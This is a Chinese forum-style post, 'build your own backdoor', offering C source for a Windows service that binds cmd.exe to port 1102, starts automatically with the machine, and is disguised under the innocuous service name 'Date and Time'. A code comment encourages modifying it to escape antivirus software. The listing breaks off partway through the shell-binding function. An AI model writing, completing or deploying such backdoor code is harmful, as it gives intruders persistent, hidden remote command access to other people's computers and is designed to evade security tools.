网络安全 频道

定制自己的后门[推荐]

这里是一个创建windows服务的程序,绑定cmd.exe到1102口,随计算机启动而自动开启。服务的Thread就是BindCmd2Port函数,可以(最好是)自己定制。可能需要修改的变量在程序里面有注释,如果你一点都不改的话,那么用的时候一定要拷到path变量设定的目录(比如c:\\winnt\\system32)中,记得加上/install参数,以后telnet到1102口就可以了。

如果要改的话(最好是改一下),把那个BindCmd2Port函数整个改掉吧,我都记不得是哪里paste过来的了。

  写得匆忙,主要是急着用。本来很喜欢T-Cmd的,可是没有源代码看,只好自己写,抛砖而已,大家有玉请砸过来。

在Windows2000 Pro(???)正常(?)运行。

/*

This program creates a service which binds a

cmd.exe to port 1102(can be easily defined by

yourself). Try to modify it to escape from the

anti-virus software.

Try not paste the paste-up elsewhere.

by N.E.V.E.R@SEU

*/

#include \"windows.h\"

#include \"stdio.h\"

#pragma comment (lib, \"WS2_32.lib\")

//Global Variables

int port=1102;

//Listening port, 1 ~ 65535 as you like

char ServicesName[255]=\"Date and Time\";

//Service name, name it Bill Gate\''s Backdoor?

char ServicesDisplayName[255]=\"Date and Time\";

//Service display name

HANDLE hTerminateEvent = NULL;

SERVICE_STATUS_HANDLE hServiceStatus;

BOOL bPauseService = FALSE;

BOOL bRunningService = FALSE;

HANDLE hThread = NULL;

DWORD BindCmd2Port(LPVOID);

BOOL SendStatusToSCM(DWORD, DWORD, DWORD, DWORD, DWORD);

BOOL InitService();

VOID Handler (DWORD);

VOID terminate(DWORD);

VOID ServiceMain(DWORD, LPTSTR*);

void main(int argc, char* argv[])

{

if(argc==2&&!strcmp(argv[1],\"/install\"))

{

char binaryPathName[_MAX_PATH];

char tmp[255]=\"net start \\\"\";

strcat(tmp,ServicesName);

strcat(tmp,\"\\\"\");

GetModuleFileName(NULL,binaryPathName,_MAX_PATH);

SC_HANDLE s = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);

SC_HANDLE hNewService = CreateService(s, ServicesName, ServicesDisplayName,

SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,

SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,

binaryPathName, NULL, NULL, NULL, NULL, NULL);

if(!hNewService)

printf(\"Error Creating Services...\");

else

WinExec(tmp,0);

Sleep(4000);

CloseServiceHandle(hNewService);

CloseServiceHandle(s);

return;

}

SERVICE_TABLE_ENTRY serviceTable[] =

{

{ ServicesName, (LPSERVICE_MAIN_FUNCTION) ServiceMain},

{ NULL, NULL }

};

if(!StartServiceCtrlDispatcher(serviceTable))

{

printf(\"Failed at StartServiceCtrlDispatcher..\\n\");

printf(\"or you run this .exe directly? Try \\n %s /install\",argv[0]);

return;

}

}

DWORD BindCmd2Port(LPVOID lp)

{

char cmdLine[] = \"cmd.exe\";

SOCKET s=INVALID_SOCKET;

WSADATA WSAData;

int ret;

char Buff[2048];

HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

unsigned long lBytesRead;

SECURITY_ATTRIBUTES sa;

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)

return 0;

if((s=socket(AF_INET, SOCK_STREAM, 0))==INVALID_SOCKET)

{

closesocket(s);

WSACleanup();

return 0;

}

sockaddr_in addr;

addr.sin_family = AF_INET;

addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);

addr.sin_port = htons(port);

if(bind(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)

return 0;

if(listen(s,1)==SOCKET_ERROR)

return 0;

int temp=sizeof(addr);

while(1){

s=accept(s,(sockaddr*)&addr,&temp);

sa.nLength=12;

sa.lpSecurityDescriptor=0;

sa.bInheritHandle=TRUE;

CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);

CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

STARTUPINFO siinfo;

PROCESS_INFORMATION ProcessInformation;

ZeroMemory(&siinfo,sizeof(siinfo));

siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

siinfo.wShowWindow = SW_HIDE;

0
相关文章